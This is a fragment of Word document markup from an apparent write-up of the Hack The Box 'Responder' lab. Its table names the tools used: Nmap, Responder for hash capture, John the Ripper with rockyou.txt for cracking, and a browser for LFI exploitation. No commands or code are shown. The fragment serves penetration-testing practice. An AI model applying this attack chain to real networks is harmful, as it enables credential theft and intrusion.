      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E90FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used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Tool</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C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Network scanner for port and service discovery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C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Responder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LLMNR/NBT-NS/mDNS poisoner for hash capture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C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Password hash cracking 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C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Browser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Manual LFI exploitation and enumeration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C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Wordlist used for dictionary attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1E90FF" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB Responder Lab  |  Writeup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90FF"/>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00B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2026-03-10T23:33:28.392Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T23:33:28.393Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>